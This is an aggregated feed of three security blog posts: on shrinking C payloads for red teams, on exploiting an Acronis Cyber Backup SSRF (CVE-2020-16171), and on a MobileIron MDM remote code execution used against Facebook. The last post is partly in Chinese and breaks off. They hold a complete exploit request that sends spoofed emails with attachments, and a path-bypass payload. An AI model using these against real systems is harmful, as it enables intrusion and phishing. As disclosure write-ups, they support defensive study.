Normal view

There are new articles available, click to refresh the page.
Before yesterdayUncategorized

Smaller C Payloads on Windows

25 September 2020 at 15:20

Smaller C Payloads on Window

Introduction

Many thanks to 0xPat for his post on malware development, which is where the inspiration for this post came from.

When writing payloads for use in penetration tests or red team engagements, smaller is generally better. No matter the language you use, there is always a certain amount of overhead required for running a binary, and in the case of C, this is the C runtime library, or CRT. The C runtime is “a set of low-level routines used by a compiler to invoke some of the behaviors of a runtime environment, by inserting calls to the runtime library into compiled executable binary. The runtime environment implements the execution model, built-in functions, and other fundamental behaviors of a programming language”. On Windows, this means the various *crt.lib libraries that are linked against when you use C/C++. You might be familiar with the common compiler flags /MT and /MTd, which statically link the C runtime into the final binary. This is commonly done when you don’t want to rely on using the versioned Visual C++ runtime that ships with the version of Visual Studio you happen to be using, as the target machine may not have this exact version. In that case you would need to include the Visual C++ Redistributable or somehow have the end user install it. Clearly this is not an ideal situation for pentesters and red teamers. The alternative is to statically link the C runtime when you build your payload file, which works well and does not rely on preexisting redistributables, but unfortunately increases the size of the binary.

How can we get around this?

Introducing msvcrt.dll

msvcrt.dll is a copy of the C runtime which is included in every version of Windows from Windows 95 on. It is present even on a fresh install of Windows that does not have any additional Visual C++ redistributables installed. This makes it an ideal candidate to use for our payload. The trick is how to reference it. 0xPat points to a StackOverflow answer that describes this process in rather general terms, but without some tinkering it is not immediately obvious how to get it working. This post is aimed at saving others some time figuring this part out (shout out to AsaurusRex!).

Creating msvcrt.lib

The idea is to find all the functions that msvcrt.dll exports and add them to a library file so the linker can reference them. The process flow is to dump the exports into a file with dumpbin.exe, parse the results into .def format, which can then be converted into a library file with lib.exe. I have created a GitHub gist here that contains the commands to do this. I use Windows for dumping the exports and creating the .lib file, and Linux to do some text processing to create the .def file. I won’t go over the steps here in detail here as they are well commented in the gist.

Some Caveats

It is important to note that using msvcrt.dll is not a perfect replacement for the full C runtime. It will provide you with the C standard library functions, but not the full set of features that the runtime normally provides. This includes things like initializing everything before calling the usual main function, handling command line arguments, and probably a lot of other stuff I have not yet run into. So depending on how many features of the runtime you use, this may or may not be a problem. C++ will likely have more issues than pure C, as many C++ features involving classes and constructors are handled by the runtime, especially during program initialization.

Using msvcrt.lib

Using msvcrt.lib is fairly straight forward, as long as you know the proper compiler and linker incantations. The first step is to define _NO_CRT_STDIO_INLINE at the top of your source files. This presumably disables the use of the CRT, though I’ve not seen this explicitly defined by Microsoft anywhere. I have noticed that this definition alone is not enough. There are several compiler and linker flags that need to be set as well. I will list them here in the context of C/C++ Visual Studio project settings, as well as providing the command line argument equivalents.

Visual Studio Project Settings

  • Linker settings:
    • Advanced -> Entrypoint -> something other than main/wmain/WinMain etc.
    • Input -> Ignore All Default Libraries -> YES
    • Input -> Additional Dependencies -> add the custom msvcrt.lib path, kernel32.lib, any other libraries you may need, like ntdll.dll
  • Compiler settings:
    • Code Generation -> Runtime Library -> /MT
    • Code Generation -> /GS- (off)
    • Advanced -> Compile As -> /TC (only if you’re using C and not C++)
    • All Options -> Basic Runtime Checks -> Default

cl.exe Settings

cl.exe /MT /GS- /Tc myfile.c /link C:\path\to\msvcrt.lib "kernel32.lib" "ntdll.lib" /ENTRY:"YourEntrypointFunction" /NODEFAULTLIB

Some notes on these settings. You must have an entrypoint that is not named one of the standard Windows C/C++ function names, like main or WinMain. These are used by the C runtime, and as the full C runtime is not included, they cannot be used. Likewise, runtime buffer overflow checks (/GS) and other runtime checks are part of the C library and so not available to us.

If you plan on using command line arguments, you can still do so, but you’ll need to use CommandLineToArgvW and link against Shell32.lib.

Conclusion

Using this method I’ve seen a size reduction from 8x-12x in the resulting binary. I hope this post can serve as helpful documentation for others trying to get this working. Feel free to contact me if you have any issues or questions, and especially if you have any improvements or better ways of accomplishing this.

CVE-2020-16171: Exploiting Acronis Cyber Backup for Fun and Emails

14 September 2020 at 00:00

CVE-2020-16171: Exploiting Acronis Cyber Backup for Fun and Emails

You have probably read one or more blog posts about SSRFs, many being escalated to RCE. While this might be the ultimate goal, this post is about an often overlooked impact of SSRFs: application logic impact.

This post will tell you the story about an unauthenticated SSRF affecting Acronis Cyber Backup up to v12.5 Build 16341, which allows sending fully customizable emails to any recipient by abusing a web service that is bound to localhost. The fun thing about this issue is that the emails can be sent as backup indicators, including fully customizable attachments. Imagine sending Acronis “Backup Failed” emails to the whole organization with a nice backdoor attached to it? Here you go.

Root Cause Analysis

So Acronis Cyber Backup is essentially a backup solution that offers administrators a powerful way to automatically backup connected systems such as clients and even servers. The solution itself consists of dozens of internally connected (web) services and functionalities, so it’s essentially a mess of different C/C++, Go, and Python applications and libraries.

The application’s main web service runs on port 9877 and presents you with a login screen:

Now, every hacker’s goal is to find something unauthenticated. Something cool. So I’ve started to dig into the source code of the main web service to find something cool. Actually, it didn’t take me too long to discover that something in a method called make_request_to_ams:

# WebServer/wcs/web/temp_ams_proxy.py:

def make_request_to_ams(resource, method, data=None):
    port = config.CONFIG.get('default_ams_port', '9892')
    uri = 'http://{}:{}{}'.format(get_ams_address(request.headers), port, resource)
[...]

The main interesting thing here is the call to get_ams_address(request.headers), which is used to construct a Uri. The application reads out a specific request header called Shard within that method:

def get_ams_address(headers):
    if 'Shard' in headers:
        logging.debug('Get_ams_address address from shard ams_host=%s', headers.get('Shard'))
        return headers.get('Shard')  # Mobile agent >= ABC5.0

When having a further look at the make_request_to_ams call, things are getting pretty clear. The application uses the value from the Shard header in a urllib.request.urlopen call:

def make_request_to_ams(resource, method, data=None):
[...]
    logging.debug('Making request to AMS %s %s', method, uri)
    headers = dict(request.headers)
    del headers['Content-Length']
    if not data is None:
        headers['Content-Type'] = 'application/json'
    req = urllib.request.Request(uri,
                                 headers=headers,
                                 method=method,
                                 data=data)
    resp = None
    try:
        resp = urllib.request.urlopen(req, timeout=wcs.web.session.DEFAULT_REQUEST_TIMEOUT)
    except Exception as e:
        logging.error('Cannot access ams {} {}, error: {}'.format(method, resource, e))
    return resp

So this is a pretty straight-forward SSRF including a couple of bonus points making the SSRF even more powerful:

  • The instantiation of the urllib.request.Request class uses all original request headers, the HTTP method from the request, and the even the whole request body.
  • The response is fully returned!

The only thing that needs to be bypassed is the hardcoded construction of the destination Uri since the API appends a semicolon, a port, and a resource to the requested Uri:

uri = 'http://{}:{}{}'.format(get_ams_address(request.headers), port, resource)

However, this is also trivially easy to bypass since you only need to append a ? to turn those into parameters. A final payload for the Shard header, therefore, looks like the following:

Shard: localhost?

Finding Unauthenticated Routes

To exploit this SSRF we need to find a route which is reachable without authentication. While most of CyberBackup’s routes are only reachable with authentication, there is one interesting route called /api/ams/agents which is kinda different:

# WebServer/wcs/web/temp_ams_proxy.py:
_AMS_ADD_DEVICES_ROUTES = [
    (['POST'], '/api/ams/agents'),
] + AMS_PUBLIC_ROUTES

Every request to this route is passed to the route_add_devices_request_to_ams method:

def setup_ams_routes(app):
[...]
    for methods, uri, *dummy in _AMS_ADD_DEVICES_ROUTES:
        app.add_url_rule(uri,
                         methods=methods,
                         view_func=_route_add_devices_request_to_ams)
[...]

This in return does only check whether the allow_add_devices configuration is enabled (which is the standard config) before passing the request to the vulnerable _route_the_request_to_ams method:

               
def _route_add_devices_request_to_ams(*dummy_args, **dummy_kwargs):
    if not config.CONFIG.get('allow_add_devices', True):
        raise exceptions.operation_forbidden_error('Add devices')

    return _route_the_request_to_ams(*dummy_args, **dummy_kwargs)

So we’ve found our attackable route without authentication here.

Sending Fully Customized Emails Including An Attachment

Apart from doing meta-data stuff or similar, I wanted to entirely fire the SSRF against one of Cyber Backup’s internal web services. There are many these, and there are a whole bunch of web services whose authorization concept solely relies only on being callable from the localhost. Sounds like a weak spot, right?

One interesting internal web service is listening on localhost port 30572: the Notification Service. This service offers a variety of functionality to send out notifications. One of the provided endpoints is /external_email/:

@route(r'^/external_email/?')
class ExternalEmailHandler(RESTHandler):
    @schematic_request(input=ExternalEmailValidator(), deserialize=True)
    async def post(self):
        try:
            error = await send_external_email(
                self.json['tenantId'], self.json['eventLevel'], self.json['template'], self.json['parameters'],
                self.json.get('images', {}), self.json.get('attachments', {}), self.json.get('mainRecipients', []),
                self.json.get('additionalRecipients', [])
            )
            if error:
                raise HTTPError(http.BAD_REQUEST, reason=error.replace('\n', ''))
        except RuntimeError as e:
            raise HTTPError(http.BAD_REQUEST, reason=str(e))

I’m not going through the send_external_email method in detail since it is rather complex, but this endpoint essentially uses parameters supplied via HTTP POST to construct an email that is send out afterwards.

The final working exploit looks like the following:

POST /api/ams/agents HTTP/1.1
Host: 10.211.55.10:9877
Shard: localhost:30572/external_email?
Connection: close
Content-Length: 719
Content-Type: application/json;charset=UTF-8

{"tenantId":"00000000-0000-0000-0000-000000000000",
"template":"true_image_backup",
"parameters":{
"what_to_backup":"what_to_backup",
"duration":2,
"timezone":1,
"start_time":1,
"finish_time":1,
"backup_size":1,
"quota_servers":1,
"usage_vms":1,
"quota_vms":1,"subject_status":"subject_status",
"machine_name":"machine_name",
"plan_name":"plan_name",
"subject_hierarchy_name":"subject_hierarchy_name",
"subject_login":"subject_login",
"ams_machine_name":"ams_machine_name",
"machine_name":"machine_name",
"status":"status","support_url":"support_url"
},
"images":{"test":"./critical-alert.png"},
"attachments":{"test.html":"PHU+U29tZSBtb3JlIGZ1biBoZXJlPC91Pg=="},
"mainRecipients":["[email protected]"]}

This involves a variety of “customizations” for the email including a base64-encoded attachments value. Issuing this POST request returns null:

but ultimately sends out the email to the given mainRecipients including some attachments:

Perfectly spoofed mail, right ;-) ?

The Fix

Acronis fixed the vulnerability in version v12.5 Build 16342 of Acronis Cyber Backup by changing the way that get_ams_address gets the actual Shard address. It now requires an additional authorization header with a JWT that is passed to a method called resolve_shard_address:

# WebServer/wcs/web/temp_ams_proxy.py:
def get_ams_address(headers):
    if config.is_msp_environment():
        auth = headers.get('Authorization')
        _bearer_prefix = 'bearer '
        _bearer_prefix_len = len(_bearer_prefix)
        jwt = auth[_bearer_prefix_len:]
        tenant_id = headers.get('X-Apigw-Tenant-Id')
        logging.info('GET_AMS: tenant_id: {}, jwt: {}'.format(tenant_id, jwt))
        if tenant_id and jwt:
            return wcs.web.session.resolve_shard_address(jwt, tenant_id)

While both values tenant_id and jwt are not explicitly validated here, they are simply used in a new hardcoded call to the API endpoint /api/account_server/tenants/ which ultimately verifies the authorization:

# WebServer/wcs/web/session.py:
def resolve_shard_address(jwt, tenant_id):
    backup_account_server = config.CONFIG['default_backup_account_server']
    url = '{}/api/account_server/tenants/{}'.format(backup_account_server, tenant_id)

    headers = {
        'Authorization': 'Bearer {}'.format(jwt)
    }

    from wcs.web.proxy import make_request
    result = make_request(url,
                          logging.getLogger(),
                          method='GET',
                          headers=headers).json()
    kind = result['kind']
    if kind not in ['unit', 'customer']:
        raise exceptions.unsupported_tenant_kind(kind)
    return result['ams_shard']

Problem solved.

How I Hacked Facebook Again! Unauthenticated RCE on MobileIron MDM

11 September 2020 at 16:00

English Version 中文版本

Hi, it’s a long time since my last article. This new post is about my research this March, which talks about how I found vulnerabilities on a leading Mobile Device Management product and bypassed several limitations to achieve unauthenticated RCE. All the vulnerabilities have been reported to the vendor and got fixed in June. After that, we kept monitoring large corporations to track the overall fixing progress and then found that Facebook didn’t keep up with the patch for more than 2 weeks, so we dropped a shell on Facebook and reported to their Bug Bounty program!

This research is also presented at HITCON 2020. You can check the slides here


As a Red Teamer, we are always looking for new paths to infiltrate the corporate network from outside. Just like our research in Black Hat USA last year, we demonstrated how leading SSL VPNs could be hacked and become your Virtual “Public” Network! SSL VPN is trusted to be secure and considered the only way to your private network. But, what if your trusted appliances are insecure?

Based on this scenario, we would like to explore new attack surfaces on enterprise security, and we get interested in MDM, so this is the article for that!

What is MDM?

Mobile Device Management, also known as MDM, is an asset assessment system that makes the employees’ BYOD more manageable for enterprises. It was proposed in 2012 in response to the increasing number of tablets and mobile devices. MDM can guarantee that the devices are running under the corporate policy and in a trusted environment. Enterprise could manage assets, install certificates, deploy applications and even lock/wipe devices remotely to prevent data leakage as well.

UEM (Unified Endpoint Management) is a newer term relevant to MDM which has a broader definition for managed devices. Following we use MDM to represent similar products!

Our target

MDM, as a centralized system, can manage and control all employees’ devices. It is undoubtedly an ideal asset assessment system for a growing company. Besides, MDM must be reachable publicly to synchronize devices all over the world. A centralized and public-exposing appliance, what could be more appealing to hackers?

Therefore, we have seen hackers and APT groups abusing MDM these years! Such as phishing victims to make MDM a C&C server of their mobile devices, or even compromising the corporate exposed MDM server to push malicious Trojans to all devices. You can read the report Malicious MDM: Let’s Hide This App by Cisco Talos team and First seen in the wild - Malware uses Corporate MDM as attack vector by CheckPoint CPR team for more details!

From previous cases, we know that MDM is a solid target for hackers, and we would like to do research on it. There are several MDM solutions, even famous companies such as Microsoft, IBM and Apple have their own MDM solution. Which one should we start with?

We have listed known MDM solutions and scanned corresponding patterns all over the Internet. We found that the most prevalent MDMs are VMware AirWatch and MobileIron!

So, why did we choose MobileIron as our target? According to their official website, more than 20,000 enterprises chose MobileIron as their MDM solution, and most of our customers are using that as well. We also know Facebook has exposed the MobileIron server since 2016. We have analyzed Fortune Global 500 as well, and found more than 15% using and exposing their MobileIron server to the public! Due to above reasons, it became our main target!

Where to Start

From past vulnerabilities, we learned there aren’t too many researchers diving into MobileIron. Perhaps the attack vector is still unknown. But we suspect the main reason is that the firmware is too hard to obtain. When researching an appliance, turning a pure BlackBox testing into GrayBox, or WhiteBox testing is vital. We spent lots of time searching for all kinds of information on the Internet, and ended up with an RPM package. This RPM file is supposed to be the developer’s testing package. The file is just sitting on a listable WebRoot and indexed by Google Search.

Anyway, we got a file to research. The released date of the file is in early 2018. It seems a little bit old but still better than nothing!

P.S. We have informed MobileIron and the sensitive files has been removed now.

Finding Vulnerabilities

After a painful time solving the dependency hell, we set the testing package up finally. The component is based on Java and exposed three ports:

  • 443 - the user enrollment interface
  • 8443 - the appliance management interface
  • 9997 - the MobileIron device synchronization protocol (MI Protocol)

All opened ports are TLS-encrypted. Apache is in the front of the web part and proxies all connections to backend, a Tomcat with Spring MVC inside.

Due to the Spring MVC, it’s hard to find traditional vulnerabilities like SQL Injection or XSS from a single view. Therefore, examining the logic and architecture is our goal this time!

Talking about the vulnerability, the root cause is straightforward. Tomcat exposed a Web Service that deserializes user input with Hessian format. However, this doesn’t mean we can do everything! The main effort of this article is to solve that, so please see the exploitation below.

Although we know the Web Service deserializes the user input, we can not trigger it. The endpoint is located on both:

  • User enrollment interface - https://mobileiron/mifs/services/
  • Management interface - https://mobileiron:8443/mics/services/

We can only touch the deserialization through the management interface because the user interface blocks the Web Service access. It’s a critical hit for us because most enterprises won’t expose their management interface to the Internet, and a management-only vulnerability is not useful to us so that we have to try harder. :(

Scrutinizing the architecture, we found Apache blocks our access through Rewrite Rules. It looks good, right?

RewriteRule ^/mifs/services/(.*)$ https://%{SERVER_NAME}:8443/mifs/services/$1 [R=307,L]
RewriteRule ^/mifs/services [F]

MobileIron relied on Apache Rewrite Rules to block all the access to Web Service. It’s in the front of a reverse-proxy architecture, and the backend is a Java-based web server.

Have you recalled something?


Yes, the Breaking Parser Logic! It’s the reverse proxy attack surface I proposed in 2015, and presented at Black Hat USA 2018. This technique leverage the inconsistency between the Apache and Tomcat to bypass the ACL control and reaccess the Web Service. BTW, this excellent technique is also applied to the recently F5 BIG-IP TMUI RCE vulnerability!

https://mobileiron/mifs/.;/services/someService

Exploiting Vulnerabilities

OK, now we have access to the deserialization wherever it’s on enrollment interface or management interface. Let’s go back to exploitations!

Moritz Bechler has an awesome research which summarized the Hessian deserialization vulnerability on his whitepaper, Java Unmarshaller Security. From the marshalsec source code, we learn the Hessian deserialization triggers the equals() and hashcode() while reconstructing a HashMap. It could also trigger the toString() through the XString, and the known exploit gadgets so far are:

  • Apache XBean
  • Caucho Resin
  • Spring AOP
  • ROME EqualsBean/ToStringBean

In our environment, we could only trigger the Spring AOP gadget chain and get a JNDI Injection.

  Name Effect
x Apache XBean JNDI Injection
x Caucho Resin JNDI Injection
Spring AOP JNDI Injection
x ROME EqualsBean RCE

Once we have a JNDI Injection, the rest parts of exploitations are easy! We can just leverage Alvaro Muñoz and Oleksandr Mirosh’s work, A Journey From JNDI/LDAP to Remote Code Execution Dream Land, from Black Hat USA 2016 to get the code execution… Is that true?


Since Alvaro Muñoz and Oleksandr Mirosh introduced this on Black Hat, we could say that this technique helps countless security researchers and brings Java deserialization vulnerability into a new era. However, Java finally mitigated the last JNDI/LDAP puzzle in October 2018. After that, all java version higher than 8u181, 7u191, and 6u201 can no longer get code execution through JNDI remote URL-Class loading. Therefore, if we exploit the Hessian deserialization on the latest MobileIron, we must face this problem!

Java changed the default value of com.sun.jndi.ldap.object.trustURLCodebase to False to prevent attackers from downloading remote URL-Class to get code executions. But only this has been prohibited. We can still manipulate the JNDI and redirect the Naming Reference to a local Java Class!

The concept is a little bit similar to Return-Oriented Programming, utilizing a local existing Java Class to do further exploitations. You can refer to the article Exploiting JNDI Injections in Java by Michael Stepankin in early 2019 for details. It describes the attack on POST-JNDI exploitations and how to abuse the Tomcat’s BeanFactory to populate the ELProcessor gadget to get code execution. Based on this concept, researcher Welkin also provides another ParseClass gadget on Groovy. As described in his (Chinese) article:

除了 javax.el.ELProcessor,当然也还有很多其他的类符合条件可以作为 beanClass 注入到 BeanFactory 中实现利用。举个例子,如果目标机器 classpath 中有 groovy 的库,则可以结合之前 Orange 师傅发过的 Jenkins 的漏洞实现利用

It seems the Meta Programming exploitation in my previous Jenkins research could be used here as well. It makes the Meta Programming great again :D


The approach is fantastic and looks feasible for us. But both gadgets ELProcessor and ParseClass are unavailable due to our outdated target libraries. Tomcat introduced the ELProcessor since 8.5, but our target is 7. As for the Groovy gadget, the target Groovy version is too old (1.5.6 from 2008) to support the Meta Programming, so we still have to find a new gadget by ourselves. We found a new gadget on GroovyShell in the end. If you are interested, you can check the Pull Request I sent to the JNDI-Injection-Bypass project!

Attacking Facebook

Now we have a perfect RCE by chaining JNDI Injection, Tomcat BeanFactory and GroovyShell. It’s time to hack Facebook!

Aforementioned, we knew the Facebook uses MobileIron since 2016. Although the server’s index responses 403 Forbidden now, the Web Service is still accessible!

Everything is ready and wait for our exploit! However, several days before our scheduled attack, we realized that there is a critical problem in our exploit. From our last time popping shell on Facebook, we noticed it blocks outbound connections due to security concerns. The outbound connection is vital for JNDI Injection because the idea is to make victims connecting to a malicious server to do further exploitations. But now, we can’t even make an outbound connection, not to mention others.


So far, all attack surfaces on JNDI Injection have been closed, we have no choice but to return to Hessian deserialization. But due to the lack of available gadgets, we must discover a new one by ourselves!


Before discovering a new gadget, we have to understand the existing gadgets’ root cause properly. After re-reading Moritz Bechler’s paper, a certain word interested me:

Cannot restore Groovy’s MethodClosure as readResolve() is called which throws an exception.


A question quickly came up in my mind: Why did the author leave this word here? Although it failed with exceptions, there must have been something special so that the author write this down.

Our target is running with a very old Groovy, so we are guessing that the readResolve() constrain might not have been applied to the code base yet! We compared the file groovy/runtime/MethodClosure.java between the latest and 1.5.6.

$ diff 1_5_6/MethodClosure.java 3_0_4/MethodClosure.java

>     private Object readResolve() {
>         if (ALLOW_RESOLVE) {
>             return this;
>         }
>         throw new UnsupportedOperationException();
>     }

Yes, we are right. There is no ALLOW_RESOLVE in Groovy 1.5.6, and we later learned CVE-2015-3253 is just for that. It’s a mitigation for the rising Java deserialization vulnerability in 2015. Since Groovy is an internally used library, developers won’t update it if there is no emergency. The outdated Groovy could also be a good case study to demonstrated how a harmless component can leave you compromised!

Of course we got the shell on Facebook in the end. Here is the video:

Vulnerability Report and Patch

We have done all the research on March and sent the advisory to MobileIron at 4/3. The MobileIron released the patch on 6/15 and addressed three CVEs for that. You can check the official website for details!

  • CVE-2020-15505 - Remote Code Execution
  • CVE-2020-15506 - Authentication Bypass
  • CVE-2020-15507 - Arbitrary File Reading

After the patch has been released, we start monitoring the Internet to track the overall fixing progress. Here we check the Last-Modified header on static files so that the result is just for your information. (Unknown stands for the server closed both 443 and 8443 ports)


At the same time, we keep our attentions on Facebook as well. With 15 days no-patch confirm, we finally popped a shell and report to their Bug Bounty program at 7/2!

Conclusion

So far, we have demonstrated a completely unauthenticated RCE on MobileIron. From how we get the firmware, find the vulnerability, and bypass the JNDI mitigation and network limitation. There are other stories, but due to the time, we have just listed topics here for those who are interested:

  • How to take over the employees’ devices from MDM
  • Disassemble the MI Protocol
  • And the CVE-2020-15506, an interesting authentication bypass

I hope this article could draw attention to MDM and the importance of enterprise security! Thanks for reading. :D

看我如何再一次駭進 Facebook,一個在 MobileIron MDM 上的遠端程式碼執行漏洞!

11 September 2020 at 16:00

English Version 中文版本

嗨! 好久不見,這是我在今年年初的研究,講述如何尋找一款知名行動裝置管理產品的漏洞,並繞過層層保護取得遠端程式碼執行的故事! 其中的漏洞經回報後在六月由官方釋出修補程式並緊急通知他們的客戶,而我們也在修補程式釋出 15 天後發現 Facebook 並未及時更新,因此透過漏洞取得伺服器權限並回報給 Facebook!

此份研究同時發表於 HITCON 2020,你可以從這裡取得這次演講的投影片!


身為一個專業的紅隊,我們一直在尋找著更快速可以從外部進入企業內網的最佳途徑! 如同我們去年在 Black Hat USA 發表的研究,SSL VPN 理所當然會放在外部網路,成為保護著網路安全、使員工進入內部網路的基礎設施,而當你所信任、並且用來保護你安全的設備不再安全了,你該怎麼辦?

由此為發想,我們開始尋找著有沒有新的企業網路脆弱點可當成我們紅隊攻擊滲透企業的初始進入點,在調查的過程中我們對 MDM/UEM 開始產生了興趣,而這篇文章就是從此發展出來的研究成果!

什麼是 MDM/UEM ?

Mobile Device Management,簡稱 MDM,約是在 2012 年間,個人手機、平板裝置開始興起時,為了使企業更好的管理員工的 BYOD 裝置,應運而生的資產盤點系統,企業可以透過 MDM 產品,管理員工的行動裝置,確保裝置只在信任的環境、政策下運行,也可以從中心的端點伺服器,針對所控制的手機,部署應用程式、安裝憑證甚至遠端操控以管理企業資產,更可以在裝置遺失時,透過 MDM 遠端上鎖,或是抹除整台裝置資料達到企業隱私不外漏的目的!

UEM (Unified Endpoint Management) 則為近幾年來更新的一個術語,其核心皆為行動裝置的管理,只是 UEM 一詞包含更廣的裝置定義! 我們以下皆用 MDM 一詞來代指同類產品。

我們的目標

MDM 作為一個中心化的端點控制系統,可以控制、並管理旗下所有員工個人裝置! 對日益壯大的企業來說,絕對是一個最佳的資產盤點產品,相對的,對駭客來說也是! 而為了管理來自世界各地的員工裝置連線,MDM 又勢必得曝露在外網。 一個可以「管理員工裝置」又「放置在外網」的設備,這對我們的紅隊演練來說無疑是最棒的滲透管道!

另外,從這幾年的安全趨勢也不難發現 MDM 逐漸成為駭客、APT 組織的首選目標! 誘使受害者同意惡意的 MDM 成為你裝置的 C&C 伺服器,或是乾脆入侵企業放置在外網的 MDM 設備,在批次地派送行動裝置木馬感染所有企業員工手機、電腦,以達到進一步的攻擊! 這些都已成真,詳細的報告可參閱 Cisco Talos 團隊所發表的 Malicious MDM: Let’s Hide This App 以及 CheckPoint CPR 團隊所發表的 First seen in the wild - Malware uses Corporate MDM as attack vector!

從前面的幾個案例我們得知 MDM 對於企業安全來說,是一個很好的切入點,因此我們開始研究相關的攻擊面! 而市面上 MDM 廠商有非常多,各個大廠如 Microsoft、IBM 甚至 Apple 都有推出自己的 MDM 產品,我們要挑選哪個開始成為我們的研究對象呢?

因此我們透過公開情報列舉了市面上常見的 MDM 產品,並配合各家特徵對全世界進行了一次掃描,發現最多企業使用的 MDM 為 VMware AirWatch 與 MobileIron 這兩套產品! 至於要挑哪一家研究呢? 我們選擇了後者,除了考量到大部分的客戶都是使用 MobileIron 外,另外一個吸引我的點則是 Facebook 也是他們的客戶! 從我們在 2016 年發表的 How I Hacked Facebook, and Found Someone’s Backdoor Script 研究中,就已發現 Facebook 使用 MobileIron 作為他們的 MDM 解決方案!

根據 MobileIron 官方網站描述,至少有 20000+ 的企業使用 MobileIron 當成他們的 MDM 解決方案,而根據我們實際對全世界的掃描,也至少有 15% 以上的財富世界 500 大企業使用 MobileIron 且曝露在外網(實際上一定更多),因此,尋找 MobileIron 的漏洞也就變成我們的首要目標!

如何開始研究

過往出現過的漏洞可以得知 MobileIron 並沒有受到太多安全人員研究,其中原因除了 MDM 這個攻擊向量尚未廣為人知外,另一個可能是因為關於 MobileIron 的相關韌體太難取得,研究一款設備最大的問題是如何從純粹的黑箱,到可以分析的灰箱、甚至白箱! 由於無法從官網下載韌體,我們花費了好幾天嘗試著各種關鍵字在網路上尋找可利用的公開資訊,最後才在 Goolge Search 索引到的其中一個公開網站根目錄上發現疑似是開發商測試用的 RPM 包。

下載回的韌體為 2018 年初的版本,離現在也有很長一段時間,也許核心程式碼也大改過,不過總比什麼都沒有好,因此我們就從這份檔案開始研究起。

備註: 經通知 MobileIron 官方後,此開發商網站已關閉。

如何尋找漏洞

整個 MobileIron 使用 Java 作為主要開發語言,對外開放的連接埠為 443, 8443, 9997,各個連接埠對應功能如下:

  • 443 為使用者裝置註冊介面
  • 8443 為設備管理介面
  • 9997 為一個 MobileIron 私有的裝置同步協定 (MI Protocol)

三個連接埠皆透過 TLS 保護連線的安全性及完整性,網頁部分則是透過 Apache 的 Reverse Proxy 架構將連線導至後方,由 Tomcat 部署的網頁應用處理,網頁應用則由 Spring MVC 開發。

由於使用的技術架構相對新,傳統類型的漏洞如 SQL Injection 也較難從單一的點來發現,因此理解程式邏輯並配合架構層面的攻擊就變成我們這次尋找漏洞的主要目標!

這次的漏洞也很簡單,主要是 Web Service 使用了 Hessian 格式處理資料進而產生了反序列化的弱點! 雖然漏洞一句話就可以解釋完了,但懂的人才知道反序列化並不代表你可以做任何事,接下來的利用才是精彩的地方!

現在已知 MobileIron 在處理 Web Service 的地方存在 Hessian 反序列化漏洞! 但漏洞存在,並不代表我們碰得到漏洞,可以觸發 Hessian 反序列化的路徑分別在:

  • 一般使用者介面 - https://mobileiron/mifs/services/
  • 管理介面 - https://mobileiron:8443/mifs/services/

管理介面基本上沒有任何阻擋,可以輕鬆的碰到 Web Service,而一般使用者介面的 Web Service 則無法存取,這對我們來說是一個致命性的打擊,由於大部分企業的網路架構並不會將管理介面的連接埠開放在外部網路,因此只能攻擊管理介面對於的利用程度並不大,因此我們必須尋找其他的方式去觸發這個漏洞!

仔細觀察 MobileIron 的阻擋方式,發現它是透過在 Apache 上使用 Rewrite Rules 去阻擋對一般使用者介面 Web Service 的存取:

RewriteRule ^/mifs/services/(.*)$ https://%{SERVER_NAME}:8443/mifs/services/$1 [R=307,L]
RewriteRule ^/mifs/services [F]

嗯,很棒! 使用 Reverse Proxy 架構而且是在前面那層做阻擋,你是否想到什麼呢?



沒錯! 就是我們在 2015 年發現,並且在 Black Hat USA 2018 上所發表的針對 Reverse Proxy 架構的新攻擊面 Breaking Parser Logic! 這個優秀的技巧最近也被很好的利用在 CVE-2020-5902,F5 BIG-IP TMUI 的遠端程式碼執行上!

透過 Apache 與 Tomcat 對路徑理解的不一致,我們可以透過以下方式繞過 Rewrite Rule 再一次攻擊 Web Service!

https://mobileiron/mifs/.;/services/someService

碰! 因此現在不管是 8443 的管理介面還是 443 的一般使用者介面,我們都可以碰到有 Hessian 反序列化存在的 Web Service 了!

如何利用漏洞

現在讓我們回到 Hessian 反序列化的利用上! 針對 Hessian 反序列化,Moritz Bechler 已經在他的 Java Unmarshaller Security 中做了一個很詳細的研究報告! 從他所開源的 marshalsec 原始碼中,我們也學習到 Hessian 在反序列化過程中除了透過 HashMap 觸發 equals() 以及 hashcode() 等觸發點外,也可透過 XString 串出 toString(),而目前關於 Hessian 反序列化已存在的利用鏈有四條:

  • Apache XBean
  • Caucho Resin
  • Spring AOP
  • ROME EqualsBean/ToStringBean

而根據我們的目標環境,可以觸發的只有 Spring AOP 這條利用鏈!

  Name Effect
x Apache XBean JNDI 注入
x Caucho Resin JNDI 注入
Spring AOP JNDI 注入
x ROME EqualsBean RCE

無論如何,我們現在有了 JNDI 注入後,接下來只要透過 Alvaro MuñozOleksandr Mirosh 在 Black Hat USA 2016 上所發表的 A Journey From JNDI/LDAP to Remote Code Execution Dream Land 就可以取得遠端程式碼執行了… 甘安內?


自從 Alvaro MuñozOleksandr Mirosh 在 Black Hat 發表了這個新的攻擊向量後,不知道幫助了多少大大小小的駭客,甚至會有人認為「遇到反序列化就用 JNDI 送就對了!」,但自從 2018 年十月,Java 終於把關於 JNDI 注入的最後一塊拼圖給修復,這個修復被記載在 CVE-2018-3149 中,自此之後,所有 Java 高於 8u181, 7u191, 6u201 的版本皆無法透過 JNDI/LDAP 的方式執行程式碼,因此若要在最新版本的 MobileIron 上實現攻擊,我們勢必得面對這個問題!

關於 CVE-2018-3149,是透過將 com.sun.jndi.ldap.object.trustURLCodebase 的預設值改為 False 的方式以達到禁止攻擊者下載遠端 Bytecode 取得執行程式碼。

但幸運的是,我們依然可以透過 JNDI 的 Naming Reference 到本機既有的 Class Factory 上! 透過類似 Return-Oriented Programming 的概念,尋找本機 ClassPath 中可利用的類別去做更進一步的利用,詳細的手法可參考由 Michael Stepankin 在 2019 年年初所發表的 Exploiting JNDI Injections in Java,裡面詳細敘述了如何透過 Tomcat 的 BeanFactory 去載入 ELProcessor 達成任意程式碼執行!

這條路看似通暢,但實際上卻差那麼一點,由於 ELProcessor 在 Tomcat 8 後才被引入,因此上面的繞過方式只能在 Tomcat 版本大於 8 後的某個版本才能成功,而我們的目標則是 Tomcat 7.x,因此得為 BeanFactory 尋找一個新的利用鏈! 而經過搜尋,發現在 Welkin文章中所提到:

除了 javax.el.ELProcessor,当然也还有很多其他的类符合条件可以作为 beanClass 注入到 BeanFactory 中实现利用。举个例子,如果目标机器 classpath 中有 groovy 的库,则可以结合之前 Orange 师傅发过的 Jenkins 的漏洞实现利用


